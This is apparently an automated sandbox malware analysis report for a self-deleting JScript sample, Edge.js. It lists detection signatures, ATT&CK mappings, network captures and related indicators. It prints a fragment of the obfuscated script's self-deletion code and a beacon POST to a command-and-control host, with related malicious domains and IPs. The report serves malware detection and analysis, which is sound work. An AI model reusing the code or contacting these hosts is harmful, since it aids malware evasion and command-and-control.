Play interactive tourEdit tour

Analysis Report Edge.js

Overview

General Information

Sample Name:Edge.js
Analysis ID:341866
MD5:ce0243ba7da3d571ff98753a14d93a98
SHA1:0371f8c376718cc8b13708df8c68d57663464e81
SHA256:750a3bf55c131ebfa413e80ed0e88c271f8020842be9fbaf3519703b962fa3bf

Most interesting Screenshot:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Deletes itself after installation
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 3216 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Edge.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: Joe Sandbox ViewIP Address: 130.0.233.178 130.0.233.178
Source: Joe Sandbox ViewASN Name: ITLASUA ITLASUA
Source: global trafficHTTP traffic detected: POST /1x1.gif HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 904e970e.payment.refinedwebs.comContent-Length: 22Connection: Keep-AliveCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: 904e970e.payment.refinedwebs.com
Source: unknownHTTP traffic detected: POST /1x1.gif HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 904e970e.payment.refinedwebs.comContent-Length: 22Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000003.233265308.00000205A5911000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.233467858.00000205A583B000.00000004.00000001.sdmpString found in binary or memory: http://904e970e.payment.refinedwebs.com/1x1.gif
Source: wscript.exe, 00000000.00000003.233265308.00000205A5911000.00000004.00000001.sdmpString found in binary or memory: http://904e970e.payment.refinedwebs.com/1x1.gifPl
Source: wscript.exe, 00000000.00000002.233844643.00000205A5889000.00000004.00000001.sdmpString found in binary or memory: http://904e970e.payment.refinedwebs.com/1x1.gifX
Source: wscript.exe, 00000000.00000003.233308988.00000205A5889000.00000004.00000001.sdmpString found in binary or memory: http://904e970e.payment.refinedwebs.com/1x1.gifw
Source: wscript.exe, 00000000.00000003.233308988.00000205A5889000.00000004.00000001.sdmpString found in binary or memory: http://904e970e.payment.refinedwebs.com/1x1.gif~
Source: wscript.exe, 00000000.00000002.233964384.00000205A594E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com6
Source: Edge.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal52.evad.winJS@1/0@1/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installation
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\edge.jsJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: wscript.exe, 00000000.00000003.233265308.00000205A5911000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWment.refinedwebs.com
Source: wscript.exe, 00000000.00000002.234759591.00000205A79A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.233265308.00000205A5911000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.234759591.00000205A79A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.234759591.00000205A79A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.234759591.00000205A79A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 130.0.233.178 80Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting2Path InterceptionProcess Injection1Process Injection1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting2LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 341866 Sample: Edge.js Startdate: 19/01/2021 Architecture: WINDOWS Score: 52 4 wscript.exe 6 2->4         started        dnsIp3 8 904e970e.payment.refinedwebs.com 130.0.233.178, 49718, 80 ITLASUA Ukraine 4->8 10 System process connects to network (likely due to code injection or exploit) 4->10 12 Deletes itself after installation 4->12 signatures4

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
904e970e.payment.refinedwebs.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
http://904e970e.payment.refinedwebs.com/1x1.gifPl0%Avira URL Cloudsafe
http://904e970e.payment.refinedwebs.com/1x1.gifw0%Avira URL Cloudsafe
http://904e970e.payment.refinedwebs.com/1x1.gif0%Avira URL Cloudsafe
http://904e970e.payment.refinedwebs.com/1x1.gifX0%Avira URL Cloudsafe
http://904e970e.payment.refinedwebs.com/1x1.gif~0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
904e970e.payment.refinedwebs.com
130.0.233.178
truetrueunknown
NameMaliciousAntivirus DetectionReputation
http://904e970e.payment.refinedwebs.com/1x1.giftrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://904e970e.payment.refinedwebs.com/1x1.gifPlwscript.exe, 00000000.00000003.233265308.00000205A5911000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://904e970e.payment.refinedwebs.com/1x1.gifwwscript.exe, 00000000.00000003.233308988.00000205A5889000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://904e970e.payment.refinedwebs.com/1x1.gifXwscript.exe, 00000000.00000002.233844643.00000205A5889000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://904e970e.payment.refinedwebs.com/1x1.gif~wscript.exe, 00000000.00000003.233308988.00000205A5889000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
130.0.233.178
unknownUkraine
15626ITLASUAtrue

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:341866
Start date:19.01.2021
Start time:23:50:22
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Edge.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Without Instrumentation
Number of analysed new started processes analysed:1
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.evad.winJS@1/0@1/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .js
  • Stop behavior analysis, all processes terminated
Warnings:
  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144
  • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, watson.telemetry.microsoft.com
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
130.0.233.178Edge.jsGet hashmaliciousBrowse
  • 904e970e.payment.refinedwebs.com/1x1.gif
Chrome.Update.96f294.jsGet hashmaliciousBrowse
  • da47c309.payment.refinedwebs.com/1x1.gif
Chrome.Update.17a388.jsGet hashmaliciousBrowse
  • 65349eff.payment.refinedwebs.com/1x1.gif
Chrome.Update.17a388.jsGet hashmaliciousBrowse
  • 65349eff.payment.refinedwebs.com/1x1.gif
Edge.jsGet hashmaliciousBrowse
  • b4a939c6.edge.wholesalerandy.com/login.aspx
Edge.jsGet hashmaliciousBrowse
  • b4a939c6.edge.wholesalerandy.com/login.aspx
Edge.jsGet hashmaliciousBrowse
  • b4a939c6.edge.wholesalerandy.com/login.aspx
Edge.jsGet hashmaliciousBrowse
  • b4a939c6.edge.wholesalerandy.com/login.aspx
Firefox.jsGet hashmaliciousBrowse
  • d221c198.edge.wholesalerandy.com/login.aspx
Firefox.jsGet hashmaliciousBrowse
  • d221c198.edge.wholesalerandy.com/login.aspx
Chrome.Update.c720e0.jsGet hashmaliciousBrowse
  • d39fda7a.edge.wholesalerandy.com/login.aspx
Chrome.Update.c720e0.jsGet hashmaliciousBrowse
  • d39fda7a.edge.wholesalerandy.com/login.aspx
Chrome.Update.635e30.jsGet hashmaliciousBrowse
  • da612342.edge.wholesalerandy.com/login.aspx
Chrome.Update.635e30.jsGet hashmaliciousBrowse
  • da612342.edge.wholesalerandy.com/login.aspx
Chrome.Update.e5d263.jsGet hashmaliciousBrowse
  • 960afe29.edge.wholesalerandy.com/login.aspx
Chrome.Update.e5d263.jsGet hashmaliciousBrowse
  • 960afe29.edge.wholesalerandy.com/login.aspx
Malware.jsGet hashmaliciousBrowse
  • 55c14094.auth.codingbit.co.in/submit.aspx
Malware.jsGet hashmaliciousBrowse
  • 55c14094.auth.codingbit.co.in/submit.aspx
Malware.jsGet hashmaliciousBrowse
  • 55c14094.auth.codingbit.co.in/submit.aspx
Malware.jsGet hashmaliciousBrowse
  • 55c14094.auth.codingbit.co.in/submit.aspx
No context
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ITLASUAEdge.jsGet hashmaliciousBrowse
  • 130.0.233.178
Chrome.Update.96f294.jsGet hashmaliciousBrowse
  • 130.0.233.178
s3CRQNulKZ.exeGet hashmaliciousBrowse
  • 130.0.232.208
NKsplucdAu.exeGet hashmaliciousBrowse
  • 130.0.232.208
lZVNh1BPxm.exeGet hashmaliciousBrowse
  • 130.0.232.208
qG5E4q8Cv5.exeGet hashmaliciousBrowse
  • 130.0.232.208
SecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
  • 130.0.232.208
8VtIv7uONi.exeGet hashmaliciousBrowse
  • 130.0.232.208
8miw6WNHCt.exeGet hashmaliciousBrowse
  • 130.0.232.208
gGTQ8uae5s.exeGet hashmaliciousBrowse
  • 130.0.232.208
ENJ5AB3B0x.exeGet hashmaliciousBrowse
  • 130.0.232.208
0P0cZbXEbK.exeGet hashmaliciousBrowse
  • 130.0.232.208
Tk8cA6bHRS.exeGet hashmaliciousBrowse
  • 130.0.232.208
fTAYoI22iY.exeGet hashmaliciousBrowse
  • 130.0.232.208
uvjAwriS1c.exeGet hashmaliciousBrowse
  • 130.0.232.208
vAstEpls9R.exeGet hashmaliciousBrowse
  • 130.0.232.208
hmB9yvFv40.exeGet hashmaliciousBrowse
  • 130.0.232.208
ZYhucZndrm.exeGet hashmaliciousBrowse
  • 130.0.232.208
4WD28ZoLXN.exeGet hashmaliciousBrowse
  • 130.0.232.208
VLmFsICPqL.exeGet hashmaliciousBrowse
  • 130.0.232.208
No context
No context
No created / dropped files found

Static File Info

General

File type:ASCII text, with CRLF line terminators
Entropy (8bit):5.320774231073452
TrID:
    File name:Edge.js
    File size:3422
    MD5:ce0243ba7da3d571ff98753a14d93a98
    SHA1:0371f8c376718cc8b13708df8c68d57663464e81
    SHA256:750a3bf55c131ebfa413e80ed0e88c271f8020842be9fbaf3519703b962fa3bf
    SHA512:2d1abe8ec5c49f01168044f557f065b4ef9dba8af450731f9852c97e8cc4b5f2c96eceac35b668b33e6b81604cffb7d22bee5a34a637abc6642901ca50d5b34d
    SSDEEP:96:VbyHKmQhcph5lFlWGrPqlVidhPwXtqm1ilXdAt0Zb+9ni4Kzz:Vb6Twa5blWGrC+oqHl00d+Cz
    File Content Preview:try{var c=3;}catch(e){};..try {...var vymyednpy = new ActiveXObject('Scripting.FileSystemObject');...vymyednpy['DeleteFile'](this['WScript']['ScriptFullName'], true);..}..catch (e) {}....var pemujkpo = hatufu();..var kahszu = pemujkpo + 10000;..while (pem

    File Icon

    Icon Hash:e8d69ece968a9ec4

    Network Behavior

    Download Network PCAP: filteredfull

    Network Port Distribution

    • Total Packets: 11
    • 80 (HTTP)
    • 53 (DNS)
    TimestampSource PortDest PortSource IPDest IP
    Jan 19, 2021 23:51:24.168910027 CET4971880192.168.2.3130.0.233.178
    Jan 19, 2021 23:51:24.240710020 CET8049718130.0.233.178192.168.2.3
    Jan 19, 2021 23:51:24.240904093 CET4971880192.168.2.3130.0.233.178
    Jan 19, 2021 23:51:24.241673946 CET4971880192.168.2.3130.0.233.178
    Jan 19, 2021 23:51:24.242441893 CET4971880192.168.2.3130.0.233.178
    Jan 19, 2021 23:51:24.313419104 CET8049718130.0.233.178192.168.2.3
    Jan 19, 2021 23:51:24.314034939 CET8049718130.0.233.178192.168.2.3
    Jan 19, 2021 23:51:24.412233114 CET8049718130.0.233.178192.168.2.3
    Jan 19, 2021 23:51:24.412415981 CET4971880192.168.2.3130.0.233.178
    Jan 19, 2021 23:51:26.305747986 CET4971880192.168.2.3130.0.233.178
    TimestampSource PortDest PortSource IPDest IP
    Jan 19, 2021 23:51:06.498338938 CET5836153192.168.2.38.8.8.8
    Jan 19, 2021 23:51:06.546468973 CET53583618.8.8.8192.168.2.3
    Jan 19, 2021 23:51:24.009433985 CET6349253192.168.2.38.8.8.8
    Jan 19, 2021 23:51:24.155766010 CET53634928.8.8.8192.168.2.3
    Jan 19, 2021 23:51:27.736146927 CET6083153192.168.2.38.8.8.8
    Jan 19, 2021 23:51:27.787472963 CET53608318.8.8.8192.168.2.3
    Jan 19, 2021 23:51:29.856730938 CET6010053192.168.2.38.8.8.8
    Jan 19, 2021 23:51:29.921432018 CET53601008.8.8.8192.168.2.3
    Jan 19, 2021 23:51:30.812043905 CET5319553192.168.2.38.8.8.8
    Jan 19, 2021 23:51:30.860069990 CET53531958.8.8.8192.168.2.3
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Jan 19, 2021 23:51:24.009433985 CET192.168.2.38.8.8.80x4067Standard query (0)904e970e.payment.refinedwebs.comA (IP address)IN (0x0001)
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Jan 19, 2021 23:51:24.155766010 CET8.8.8.8192.168.2.30x4067No error (0)904e970e.payment.refinedwebs.com130.0.233.178A (IP address)IN (0x0001)
    • 904e970e.payment.refinedwebs.com
    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.349718130.0.233.17880C:\Windows\System32\wscript.exe
    TimestampkBytes transferredDirectionData
    Jan 19, 2021 23:51:24.241673946 CET2OUTPOST /1x1.gif HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 904e970e.payment.refinedwebs.com
    Content-Length: 22
    Connection: Keep-Alive
    Cache-Control: no-cache
    Jan 19, 2021 23:51:24.242441893 CET2OUTData Raw: 64 33 65 33 65 65 62 32 66 35 65 32 65 65 65 36 65 33 65 33 66 35
    Data Ascii: d3e3eeb2f5e2eee6e3e3f5
    Jan 19, 2021 23:51:24.412233114 CET3INHTTP/1.1 200 OK
    Server: nginx/1.14.0 (Ubuntu)
    Date: Tue, 19 Jan 2021 22:51:24 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Powered-By: PHP/7.2.34
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT


    Code Manipulations

    Statistics

    CPU Usage

    05101520s020406080100

    Click to jump to process

    Memory Usage

    05101520s0.00510MB

    Click to jump to process

    High Level Behavior Distribution

    • File
    • Registry

    Click to dive into process behavior distribution

    System Behavior

    Start time:23:51:11
    Start date:19/01/2021
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Edge.js'
    Imagebase:0x7ff714cd0000
    File size:163840 bytes
    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Code Analysis